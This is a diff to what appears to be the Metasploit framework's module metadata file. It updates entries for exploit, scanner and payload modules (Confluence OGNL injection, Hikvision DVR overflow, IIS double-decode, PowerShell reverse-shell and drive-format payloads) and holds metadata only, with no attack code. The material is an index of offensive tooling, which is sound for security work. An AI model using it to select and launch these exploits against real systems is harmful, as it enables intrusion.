@@ -22289,7 +22436,7 @@
|
||||
"microsoft-ds"
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2022-01-31 13:50:19 +0000",
|
||||
"mod_time": "2022-06-30 15:12:23 +0000",
|
||||
"path": "/modules/auxiliary/scanner/dcerpc/petitpotam.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/dcerpc/petitpotam",
|
||||
@@ -38211,6 +38358,53 @@
|
||||
"session_types": false,
|
||||
"needs_cleanup": false
|
||||
},
|
||||
"auxiliary_scanner/misc/freeswitch_event_socket_login": {
|
||||
"name": "FreeSWITCH Event Socket Login",
|
||||
"fullname": "auxiliary/scanner/misc/freeswitch_event_socket_login",
|
||||
"aliases": [
|
||||
|
||||
],
|
||||
"rank": 300,
|
||||
"disclosure_date": null,
|
||||
"type": "auxiliary",
|
||||
"author": [
|
||||
"krastanoel"
|
||||
],
|
||||
"description": "This module tests FreeSWITCH Event Socket logins on a range of\n machines and report successful attempts.",
|
||||
"references": [
|
||||
"URL-https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket"
|
||||
],
|
||||
"platform": "",
|
||||
"arch": "",
|
||||
"rport": 8021,
|
||||
"autofilter_ports": [
|
||||
|
||||
],
|
||||
"autofilter_services": [
|
||||
|
||||
],
|
||||
"targets": null,
|
||||
"mod_time": "2022-07-01 12:22:31 +0000",
|
||||
"path": "/modules/auxiliary/scanner/misc/freeswitch_event_socket_login.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "scanner/misc/freeswitch_event_socket_login",
|
||||
"check": true,
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
"Stability": [
|
||||
"crash-service-restarts"
|
||||
],
|
||||
"Reliability": [
|
||||
|
||||
],
|
||||
"SideEffects": [
|
||||
|
||||
]
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": false
|
||||
},
|
||||
"auxiliary_scanner/misc/ib_service_mgr_info": {
|
||||
"name": "Borland InterBase Services Manager Information",
|
||||
"fullname": "auxiliary/scanner/misc/ib_service_mgr_info",
|
||||
@@ -73032,7 +73226,7 @@
|
||||
"targets": [
|
||||
"Cisco RV340 Firmware Version <= 1.0.03.24"
|
||||
],
|
||||
"mod_time": "2022-05-11 18:30:11 +0000",
|
||||
"mod_time": "2022-06-10 14:01:57 +0000",
|
||||
"path": "/modules/exploits/linux/misc/cisco_rv340_sslvpn.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "linux/misc/cisco_rv340_sslvpn",
|
||||
@@ -73040,9 +73234,15 @@
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
"Stability": "crash-service-restarts",
|
||||
"Reliability": "repeatable-session",
|
||||
"SideEffects": null
|
||||
"Stability": [
|
||||
"crash-service-restarts"
|
||||
],
|
||||
"Reliability": [
|
||||
"repeatable-session"
|
||||
],
|
||||
"SideEffects": [
|
||||
|
||||
]
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": null
|
||||
@@ -73274,7 +73474,7 @@
|
||||
"description": "This module exploits a buffer overflow in the RTSP request parsing\n code of Hikvision DVR appliances. The Hikvision DVR devices record\n video feeds of surveillance cameras and offer remote administration\n and playback of recorded footage.\n\n The vulnerability is present in several models / firmware versions\n but due to the available test device this module only supports\n the DS-7204 model.",
|
||||
"references": [
|
||||
"CVE-2014-4880",
|
||||
"URL-https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities"
|
||||
"URL-https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices-multiple-vulnerabilities"
|
||||
],
|
||||
"platform": "Linux",
|
||||
"arch": "armle",
|
||||
@@ -73289,7 +73489,7 @@
|
||||
"DS-7204 Firmware V2.2.10 build 131009",
|
||||
"Debug Target"
|
||||
],
|
||||
"mod_time": "2022-01-23 15:28:32 +0000",
|
||||
"mod_time": "2022-06-22 15:49:43 +0000",
|
||||
"path": "/modules/exploits/linux/misc/hikvision_rtsp_bof.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "linux/misc/hikvision_rtsp_bof",
|
||||
@@ -80559,13 +80759,13 @@
|
||||
],
|
||||
"description": "This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to\n evaluate an OGNL expression resulting in OS command execution.",
|
||||
"references": [
|
||||
"CVE-2021-26084",
|
||||
"CVE-2022-26134",
|
||||
"URL-https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro",
|
||||
"URL-https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py",
|
||||
"URL-https://github.com/jbaines-r7/through_the_wire",
|
||||
"URL-https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis"
|
||||
],
|
||||
"platform": "Linux,Unix",
|
||||
"platform": "Linux,Unix,Windows",
|
||||
"arch": "cmd, x86, x64",
|
||||
"rport": 8090,
|
||||
"autofilter_ports": [
|
||||
@@ -80585,9 +80785,11 @@
|
||||
],
|
||||
"targets": [
|
||||
"Unix Command",
|
||||
"Linux Dropper"
|
||||
"Linux Dropper",
|
||||
"Windows Command",
|
||||
"Windows Dropper"
|
||||
],
|
||||
"mod_time": "2022-06-06 22:03:21 +0000",
|
||||
"mod_time": "2022-06-15 17:11:56 +0000",
|
||||
"path": "/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "multi/http/atlassian_confluence_namespace_ognl_injection",
|
||||
@@ -87779,7 +87981,7 @@
|
||||
"PHPMailer <5.2.18",
|
||||
"PHPMailer 5.2.18 - 5.2.19"
|
||||
],
|
||||
"mod_time": "2020-10-02 17:38:06 +0000",
|
||||
"mod_time": "2022-06-29 12:24:29 +0000",
|
||||
"path": "/modules/exploits/multi/http/phpmailer_arg_injection.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "multi/http/phpmailer_arg_injection",
|
||||
@@ -95400,7 +95602,7 @@
|
||||
"Linux",
|
||||
"Windows"
|
||||
],
|
||||
"mod_time": "2021-08-27 17:15:33 +0000",
|
||||
"mod_time": "2022-06-28 17:02:51 +0000",
|
||||
"path": "/modules/exploits/multi/misc/nomad_exec.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "multi/misc/nomad_exec",
|
||||
@@ -95411,11 +95613,11 @@
|
||||
"Stability": [
|
||||
"crash-safe"
|
||||
],
|
||||
"Reliability": [
|
||||
"SideEffects": [
|
||||
"artifacts-on-disk",
|
||||
"ioc-in-logs"
|
||||
],
|
||||
"SideEffects": [
|
||||
"Reliability": [
|
||||
"repeatable-session"
|
||||
]
|
||||
},
|
||||
@@ -103548,7 +103750,7 @@
|
||||
"Linux (x64)",
|
||||
"Linux (cmd)"
|
||||
],
|
||||
"mod_time": "2021-08-27 17:15:33 +0000",
|
||||
"mod_time": "2022-06-10 14:01:57 +0000",
|
||||
"path": "/modules/exploits/unix/webapp/bolt_authenticated_rce.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "unix/webapp/bolt_authenticated_rce",
|
||||
@@ -103556,7 +103758,9 @@
|
||||
"post_auth": true,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
"NOCVE": "0day",
|
||||
"NOCVE": [
|
||||
"0day"
|
||||
],
|
||||
"Stability": [
|
||||
"service-resource-loss"
|
||||
],
|
||||
@@ -117961,7 +118165,7 @@
|
||||
"description": "This module exploits a vulnerability in the update functionality of\n Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes\n Anti-Exploit consumer 1.03.1.1220.\n Due to the lack of proper update package validation, a man-in-the-middle\n (MITM) attacker could execute arbitrary code by spoofing the update server\n data-cdn.mbamupdates.com and uploading an executable. This module has\n been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220.",
|
||||
"references": [
|
||||
"CVE-2014-4936",
|
||||
" OSVDB-116050",
|
||||
"OSVDB-116050",
|
||||
"URL-http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and"
|
||||
],
|
||||
"platform": "Windows",
|
||||
@@ -117976,7 +118180,7 @@
|
||||
"targets": [
|
||||
"Windows Universal"
|
||||
],
|
||||
"mod_time": "2021-02-17 12:33:59 +0000",
|
||||
"mod_time": "2022-06-10 08:47:41 +0000",
|
||||
"path": "/modules/exploits/windows/browser/malwarebytes_update_exec.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/browser/malwarebytes_update_exec",
|
||||
@@ -146646,7 +146850,7 @@
|
||||
"author": [
|
||||
"jduck <jduck@metasploit.com>"
|
||||
],
|
||||
"description": "This module will execute an arbitrary payload on a Microsoft IIS installation\n that is vulnerable to the CGI double-decode vulnerability of 2001.\n\n NOTE: This module will leave a metasploit payload in the IIS scripts directory.",
|
||||
"description": "This module will execute an arbitrary payload on a Microsoft IIS installation\n that is vulnerable to the CGI double-decode vulnerability of 2001.\n\n This module has been tested successfully on:\n\n Windows 2000 Professional (SP0) (EN);\n Windows 2000 Professional (SP1) (AR);\n Windows 2000 Professional (SP1) (CZ);\n Windows 2000 Server (SP0) (FR);\n Windows 2000 Server (SP1) (EN); and\n Windows 2000 Server (SP1) (SE).\n\n Note: This module will leave a Metasploit payload exe in the IIS scripts directory.",
|
||||
"references": [
|
||||
"CVE-2001-0333",
|
||||
"OSVDB-556",
|
||||
@@ -146658,15 +146862,25 @@
|
||||
"arch": "",
|
||||
"rport": 80,
|
||||
"autofilter_ports": [
|
||||
|
||||
80,
|
||||
8080,
|
||||
443,
|
||||
8000,
|
||||
8888,
|
||||
8880,
|
||||
8008,
|
||||
3000,
|
||||
8443
|
||||
],
|
||||
"autofilter_services": [
|
||||
|
||||
"http",
|
||||
"https"
|
||||
],
|
||||
"targets": [
|
||||
"Automatic"
|
||||
"Windows (Dropper)",
|
||||
"Windows (Command)"
|
||||
],
|
||||
"mod_time": "2021-10-06 13:43:31 +0000",
|
||||
"mod_time": "2022-07-03 18:22:55 +0000",
|
||||
"path": "/modules/exploits/windows/iis/ms01_026_dbldecode.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/iis/ms01_026_dbldecode",
|
||||
@@ -146674,6 +146888,16 @@
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
"Stability": [
|
||||
"crash-safe"
|
||||
],
|
||||
"Reliability": [
|
||||
"repeatable-session"
|
||||
],
|
||||
"SideEffects": [
|
||||
"ioc-in-logs",
|
||||
"artifacts-on-disk"
|
||||
]
|
||||
},
|
||||
"session_types": false,
|
||||
"needs_cleanup": true
|
||||
@@ -170658,7 +170882,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-04-19 11:28:26 +0000",
|
||||
"mod_time": "2022-06-15 13:25:25 +0000",
|
||||
"path": "/modules/payloads/singles/cmd/windows/jjs_reverse_tcp.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/jjs_reverse_tcp",
|
||||
@@ -170696,7 +170920,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/adduser",
|
||||
@@ -170735,7 +170959,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp",
|
||||
@@ -170774,7 +170998,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/bind_hidden_tcp",
|
||||
@@ -170812,7 +171036,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/bind_ipv6_tcp",
|
||||
@@ -170851,7 +171075,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid",
|
||||
@@ -170888,7 +171112,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/bind_named_pipe",
|
||||
@@ -170925,7 +171149,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/bind_nonx_tcp",
|
||||
@@ -170963,7 +171187,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/bind_tcp",
|
||||
@@ -171003,7 +171227,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/bind_tcp_rc4",
|
||||
@@ -171041,7 +171265,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/bind_tcp_uuid",
|
||||
@@ -171078,7 +171302,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/find_tag",
|
||||
@@ -171117,7 +171341,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/reverse_hop_http",
|
||||
@@ -171154,7 +171378,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/reverse_http",
|
||||
@@ -171191,7 +171415,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/reverse_http_proxy_pstore",
|
||||
@@ -171229,7 +171453,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/reverse_ipv6_tcp",
|
||||
@@ -171266,7 +171490,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/reverse_nonx_tcp",
|
||||
@@ -171303,7 +171527,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/reverse_ord_tcp",
|
||||
@@ -171341,7 +171565,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/reverse_tcp",
|
||||
@@ -171379,7 +171603,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_allports",
|
||||
@@ -171418,7 +171642,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_dns",
|
||||
@@ -171458,7 +171682,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_rc4",
|
||||
@@ -171498,7 +171722,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_rc4_dns",
|
||||
@@ -171536,7 +171760,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/reverse_tcp_uuid",
|
||||
@@ -171574,7 +171798,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dllinject/reverse_winhttp",
|
||||
@@ -171609,7 +171833,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/dns_txt_query_exec",
|
||||
@@ -171644,7 +171868,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/download_exec",
|
||||
@@ -171680,7 +171904,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/exec",
|
||||
@@ -171717,7 +171941,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/format_all_drives",
|
||||
@@ -171755,7 +171979,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/generic/debug_trap",
|
||||
@@ -171790,7 +172014,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/generic/tight_loop",
|
||||
@@ -171826,7 +172050,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/loadlibrary",
|
||||
@@ -171862,7 +172086,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/messagebox",
|
||||
@@ -171902,7 +172126,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/bind_hidden_ipknock_tcp",
|
||||
@@ -171942,7 +172166,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/bind_hidden_tcp",
|
||||
@@ -171981,7 +172205,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/bind_ipv6_tcp",
|
||||
@@ -172020,7 +172244,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/bind_ipv6_tcp_uuid",
|
||||
@@ -172059,7 +172283,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/bind_named_pipe",
|
||||
@@ -172098,7 +172322,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/bind_nonx_tcp",
|
||||
@@ -172137,7 +172361,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/bind_tcp",
|
||||
@@ -172178,7 +172402,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/bind_tcp_rc4",
|
||||
@@ -172217,7 +172441,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/bind_tcp_uuid",
|
||||
@@ -172255,7 +172479,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/find_tag",
|
||||
@@ -172296,7 +172520,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/meterpreter/reverse_hop_http",
|
||||
@@ -172335,7 +172559,7 @@
|
||||
